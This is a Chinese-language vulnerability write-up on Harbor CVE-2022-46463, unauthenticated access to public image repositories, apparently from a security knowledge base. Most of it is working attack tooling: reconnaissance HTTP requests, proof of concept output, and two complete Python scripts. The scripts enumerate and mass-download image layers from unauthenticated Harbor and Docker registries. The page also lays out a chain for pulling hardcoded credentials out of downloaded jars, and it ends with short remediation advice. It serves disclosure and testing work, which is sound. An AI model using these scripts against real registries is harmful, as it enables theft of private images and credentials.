登录 白背景

Harbor 公开镜像仓库未授权访问 CVE-2022-46463

漏洞描述

Harbor 是为企业用户设计的容器镜像仓库开源项目,包括了权限管理 (RBAC)、LDAP、审计、安全漏洞扫描、镜像验真、管理界面、自我注册、HA 等企业必需的功能。Harbor api search 允许未认证的用户搜索仓库内存在的公开仓库,若将私有业务镜像放置于公开仓库,可能存在信息泄漏风险。

此漏洞披露时为未授权漏洞,漏洞影响存在争议。实际上该漏洞是由于安全配置不当,允许任意用户通过 /api/search?q= 接口搜索到所有公开仓库,下载公开仓库中的镜像(而非直接访问私有仓库)。但如果将私有业务镜像放置于公开仓库,可能存在信息泄漏风险,相应利用场景:

  1. 下载包含敏感环境的公开镜像;
  2. 分析镜像,发现服务启动时进行了 jar 文件拷贝操作;
  3. 提取 jar 文件,反编译获取配置文件中硬编码的账号密码。

参考链接:

漏洞复现

获取 harbor 信息:

GET /api/systeminfo HTTP/1.1   # harbor 1.x
GET /api/v2.0/systeminfo HTTP/1.1   # harbor 2.x

获取全部 images 和 projects:

GET /api/search?q=/ HTTP/1.1
GET /api/v2.0/search?q=/ HTTP/1.1

获取 images 的 version:

GET /api/repositories/<PROJECT_NAME>/<IMAGE_NAME>/tags?detail=1 HTTP/1.1
GET /api/v2.0/projects/<PROJECT_NAME>/repositories/<IMAGE_NAME>/artifacts?with_tag=true HTTP/1.1

扩展场景:

  1. 通过 404tk/CVE-2022-46463 枚举公开镜像并 dump;
  2. 分析镜像,发现服务启动时进行了 jar 文件拷贝操作;
  3. 提取 jar 文件,反编译获取配置文件中硬编码的账号密码。

漏洞 POC

$ python3 harbor.py https://192.168.11.11
[+] grafana/grafana
[+] library/openjdk

$ python3 harbor.py https://192.168.11.11  --dump library/openjdk:8
[+] Dumping library/openjdk:8
    [+] Downloading : 001c52e26ad57e3b25b439ee0052f6692e5c0f2d5d982a00a8819ace5e521452
    [+] Downloading : d9d4b9b6e964657da49910b495173d6c4f0d9bc47b3b44273cf82fd32723d165
    [+] Downloading : 2068746827ec1b043b571e4788693eab7e9b2a95301176512791f8c317a2816a
    [+] Downloading : 9daef329d35093868ef75ac8b7c6eb407fa53abbcb3a264c218c2ec7bca716e6
    [+] Downloading : d85151f15b6683b98f21c3827ac545188b1849efb14a1049710ebc4692de3dd5
    [+] Downloading : 52a8c426d30b691c4f7e8c4b438901ddeb82ff80d4540d5bbd49986376d85cc9
    [+] Downloading : 8754a66e005039a091c5ad0319f055be393c7123717b1f6fee8647c338ff3ceb

$ python3 harbor.py https://192.168.11.11 --dump_all
[+] grafana/grafana
[+] library/openjdk
[+] Dumping grafana/grafana:latest
    [+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
    [+] Downloading : b39e2761d3d4971e78914857af4c6bd9989873b53426cf2fef3e76983b166fa2
    [+] Downloading : c8ee6ca703b866ac2b74b6129d2db331936292f899e8e3a794474fdf81343605
    [+] Downloading : c1de0f9cdfc1f9f595acd2ea8724ea92a509d64a6936f0e645c65b504e7e4bc6
    [+] Downloading : 4007a89234b4f56c03e6831dc220550d2e5fba935d9f5f5bcea64857ac4f4888
[+] Dumping library/openjdk:8
    [+] Downloading : 001c52e26ad57e3b25b439ee0052f6692e5c0f2d5d982a00a8819ace5e521452
    [+] Downloading : d9d4b9b6e964657da49910b495173d6c4f0d9bc47b3b44273cf82fd32723d165
    [+] Downloading : 2068746827ec1b043b571e4788693eab7e9b2a95301176512791f8c317a2816a
    [+] Downloading : 9daef329d35093868ef75ac8b7c6eb407fa53abbcb3a264c218c2ec7bca716e6
    [+] Downloading : d85151f15b6683b98f21c3827ac545188b1849efb14a1049710ebc4692de3dd5
    [+] Downloading : 52a8c426d30b691c4f7e8c4b438901ddeb82ff80d4540d5bbd49986376d85cc9
    [+] Downloading : 8754a66e005039a091c5ad0319f055be393c7123717b1f6fee8647c338ff3ceb

harbor.py

# -*- coding:utf-8 -*-
import os
import tarfile
import argparse
import requests

requests.packages.urllib3.disable_warnings()

CACHE_PATH = "./caches/"
TIMEOUT = 5

def manageArgs():
    parser = argparse.ArgumentParser()
    parser.add_argument("url", help="URL")
    parser.add_argument("--v2", dest='v2', default=False, help="API v2.0", action="store_true")
    action = parser.add_mutually_exclusive_group()
    action.add_argument("--dump", metavar="IMAGENAME", dest='dump', type=str, help="ImageName")
    action.add_argument("--tags", dest='tags', default=False, help="list tags", action="store_true")
    action.add_argument("--dump_all", dest='dump_all', help="dump all", action="store_true")
    args = parser.parse_args()
    return args

def createDir(directoryName):
    if "../" in directoryName:
        print("[-] Hacker!")
        return
    if not os.path.exists(f"{CACHE_PATH}{directoryName}"):
        os.makedirs(f"{CACHE_PATH}{directoryName}")

class HarborUnauth():
    def getImages(self):
        url = "%s/api/search?q=" % self.target
        url_v2 = "%s/api/v2.0/search?q=/" % self.target
        try:
            req=requests.get(url,timeout=TIMEOUT,verify=False)
            if req.status_code != 200:
                self.v2 = True
                print("[*] API version used v2.0")
                req=requests.get(url_v2,timeout=TIMEOUT,verify=False)
            repos = req.json()["repository"]
            images = []
            for repo in repos:
                print("[+]",repo["repository_name"])
                if self.list_tags:
                    self.getTags(repo["repository_name"])
                images.append(repo["repository_name"])
            return images
        except Exception as e:
            print("[-] Not vulnerability.")
            return None
    
    def getTags(self,image_name):
        results = []
        url = "%s/api/repositories/%s/tags?detail=1"%(self.target,image_name)
        if self.v2:
            info = image_name.split("/")
            if len(info) != 2:
                print("[-] Image name format error.")
                return results
            url = "%s/api/v2.0/projects/%s/repositories/%s/artifacts?with_tag=true"%(self.target,info[0],info[1])
        try:
            req = requests.get(url,timeout=TIMEOUT,verify=False)
            tags = req.json()
            for tag in tags:
                if "name" in tag.keys():
                    tag_name = tag["name"]
                elif tag["tags"] == None:
                    tag_name = tag["digest"].split(":")[1][:6]
                else:
                    tag_name = tag["tags"][0]["name"]
                if self.list_tags:
                    print(f"    [*] {image_name}:{tag_name}")
                results.append({"image":image_name,"tag":tag_name,"sha256":tag["digest"]})
            if self.list_tags:
                print()
        except Exception as e:
            print("[-] Get tags failed, maybe you should specify the --v2 argument.")
        return results
    
    def getToken(self,image_name):
        url = f"{self.target}/service/token?scope=repository%3A{image_name}%3Apull&service=harbor-registry"
        try:
            req=requests.get(url,timeout=TIMEOUT,verify=False)
            auth=req.json()["token"]
            return auth
        except Exception as e:
            return ""
    
    def getBlob(self,image_name,version,digest,header):
        url = "%s/v2/%s/manifests/%s" % (self.target,image_name,digest)
        try:
            req=requests.get(url,headers=header,timeout=TIMEOUT,verify=False)
            layers = req.json()["layers"]
            createDir(image_name.replace("/","_")+"/"+version.replace(".","_"))
            for l in layers:
                self.downloadSha(image_name,version,l["digest"],header)
        except Exception as e:
            print("[-]",str(e))
    
    def downloadSha(self,image_name,version,sha256,header):
        dir = image_name.replace("/","_")+"/"+version.replace(".","_")
        name = sha256.split(":")[1]
        filenamesha = f"{CACHE_PATH}{dir}/{name}.tar.gz"
        url = f"{self.target}/v2/{image_name}/blobs/{sha256}"
        try:
            req=requests.get(url,headers=header,timeout=TIMEOUT,verify=False)
            if req.status_code == 200:
                print(f"    [+] Downloading : {name}")
                with open(filenamesha, 'wb') as out:
                    for bits in req.iter_content():
                        out.write(bits)
                tf = tarfile.open(filenamesha)
                tf.extractall(f"{CACHE_PATH}{dir}/{name}")
                os.remove(filenamesha)
            else:
                print("    [-] Download fail:",req.status_code)
        except Exception as e:
            print(e)
    
    def check(self,args):
        self.target = args.url.strip().strip("/")
        self.v2 = args.v2
        self.list_tags = args.tags
        images = []
        if args.dump:
            images.append(args.dump)
        else:
            images = self.getImages()
            if images != None and len(images)==0:
                print("[-] 0 public images found.")
                return
            if not args.dump_all:
                return
        for image in images:
            auth = self.getToken(image)
            if auth == "":
                print("[-] Get token failed.")
                return
            header = {"Authorization": "Bearer "+auth}
            tags = self.getTags(image)
            for tag in tags:
                print("[+] Dumping : %s:%s"%(tag["image"],tag["tag"]))
                self.getBlob(tag["image"],tag["tag"],tag["sha256"],header)

if __name__ == "__main__":
    args = manageArgs()
    m = HarborUnauth()
    m.check(args)

registry.py(Docker Registry API dump)

# -*- coding:utf-8 -*-
import os
import tarfile
import argparse
import requests

requests.packages.urllib3.disable_warnings()

CACHE_PATH = "./caches/"
TIMEOUT = 5

def manageArgs():
    parser = argparse.ArgumentParser()
    parser.add_argument("url", help="URL")
    action = parser.add_mutually_exclusive_group()
    action.add_argument("--dump", metavar="IMAGENAME", dest='dump', type=str, help="ImageName")
    action.add_argument("--tags", dest='tags', default=False, help="list tags", action="store_true")
    action.add_argument("--dump_all", dest='dump_all', help="dump all", action="store_true")
    args = parser.parse_args()
    return args

def createDir(directoryName):
    if "../" in directoryName:
        print("[-] Hacker!")
        return
    if not os.path.exists(f"{CACHE_PATH}{directoryName}"):
        os.makedirs(f"{CACHE_PATH}{directoryName}")

class RegistryUnauth():
    def getImages(self):
        url = "%s/v2/_catalog" % self.target
        try:
            req=requests.get(url,timeout=TIMEOUT,verify=False)
            repos = req.json()["repositories"]
            images = []
            for repo in repos:
                print("[+]",repo)
                if self.list_tags:
                    self.getTags(repo)
                images.append(repo)
            return images
        except Exception as e:
            print("[-] Not vulnerability.")
            return None
    
    def getTags(self,image_name):
        results = []
        url = "%s/v2/%s/tags/list"%(self.target,image_name)
        try:
            req = requests.get(url,timeout=TIMEOUT,verify=False)
            tags = req.json()["tags"]
            for tag in tags:
                if self.list_tags:
                    print(f"    [*] {image_name}:{tag}")
                results.append({"image":image_name,"tag":tag})
            if self.list_tags:
                print()
        except Exception as e:
            print("[-] Get tags failed,", str(e))
        return results
    
    def getBlob(self,image_name,tag):
        url = "%s/v2/%s/manifests/%s" % (self.target,image_name,tag)
        try:
            req=requests.get(url,timeout=TIMEOUT,verify=False)
            layers = req.json()["fsLayers"]
            createDir(image_name.replace("/","_")+"/"+tag.replace(".","_"))
            for l in layers:
                self.downloadSha(image_name,tag,l["blobSum"])
        except Exception as e:
            print("[-]",str(e))
    
    def downloadSha(self,image_name,version,sha256):
        dir = image_name.replace("/","_")+"/"+version.replace(".","_")
        name = sha256.split(":")[1]
        filenamesha = f"{CACHE_PATH}{dir}/{name}.tar.gz"
        url = f"{self.target}/v2/{image_name}/blobs/{sha256}"
        try:
            req=requests.get(url,timeout=TIMEOUT,verify=False)
            if req.status_code == 200:
                print(f"    [+] Downloading : {name}")
                with open(filenamesha, 'wb') as out:
                    for bits in req.iter_content():
                        out.write(bits)
                tf = tarfile.open(filenamesha)
                tf.extractall(f"{CACHE_PATH}{dir}/{name}")
                os.remove(filenamesha)
            else:
                print("    [-] Download fail:",req.status_code)
        except Exception as e:
            print(e)
    
    def check(self,args):
        self.target = args.url.strip().strip("/")
        self.list_tags = args.tags
        images = []
        if args.dump:
            images.append(args.dump)
        else:
            images = self.getImages()
            if images != None and len(images)==0:
                print("[-] 0 public images found.")
                return
            if not args.dump_all:
                return
        for image in images:
            tags = self.getTags(image)
            for tag in tags:
                print("[+] Dumping : %s:%s"%(tag["image"],tag["tag"]))
                self.getBlob(tag["image"],tag["tag"])

if __name__ == "__main__":
    args = manageArgs()
    m = RegistryUnauth()
    m.check(args)

漏洞修复

  1. 限制公开访问,进入“项目设置”→“配置管理”→“项目仓库”中的“公开”,取消勾选。
  2. 在业务允许的前提下,将系统部署在内网,减少外部暴露面。